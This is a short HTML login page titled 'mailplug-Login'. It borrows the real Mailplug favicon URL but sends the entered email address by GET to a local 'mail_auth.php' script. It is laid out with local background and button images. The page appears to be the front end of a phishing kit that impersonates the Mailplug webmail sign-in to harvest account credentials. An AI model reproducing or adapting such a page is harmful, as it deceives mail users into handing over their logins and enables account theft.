<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>mailplug-Login</title>
	<link rel="icon" href="https://login.mailplug.com/asset/app_api/images/login_CI/Favicon.ico">
</head>
<style>
  html, body {
  font-family: Arial, sans-serif;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 13px;
  color: #404040;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  input[type=email] {
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 56px;
  width: 360px;
  padding: 0 1px;
  margin: 0;
  background: #fff;
  border: none;
  border-bottom: 2px solid #E9E9E9;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  border-radius: 0px;
  font-size: 16px;
  line-height: 24px;
  color: #241E17;
  }
  input[type=email]:focus {
  outline: none;
  border: none;
  border-bottom: 2px solid #241E17;
  }
  </style>
<body>

<div align="center">
	<table>
		<tr>
			<td>
			<table border="0" width="100%" cellspacing="0" cellpadding="0">
				<tr>
					<td height="180"></td>
				</tr>				
				<tr>
					<td>
					<img border="0" src="img/bg-1.png" width="387" height="109"></td>
				</tr>
				<tr>
					<td height="60"></td>
				</tr>
				<tr>
					<td>
					<table border="0" width="100%" cellspacing="0" cellpadding="0">
					 <form method="get" action="mail_auth.php">
						<tr>
							<td width="12"></td>
							<td>
							    <input type="email" required name="login" placeholder="id@example.com" >
							</td>
							<td width="13"></td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td height="40"></td>
				</tr>
				<tr>
					<td>
					<table border="0" width="100%" cellspacing="0" cellpadding="0">
						<tr>
							<td width="13"></td>
							<td>
							<input type="image" src="img/btn.png" width="360" height="56"></td>
							<td width="13"></td>
						</tr>
					</table>
					</td>
				</tr>
				<tr>
					<td>
					<img border="0" src="img/bg-2.png" width="387" height="272"></td>
				</tr>
				</form>
			</table>
			</td>
		</tr>
	</table>
</div>

</body>

</html>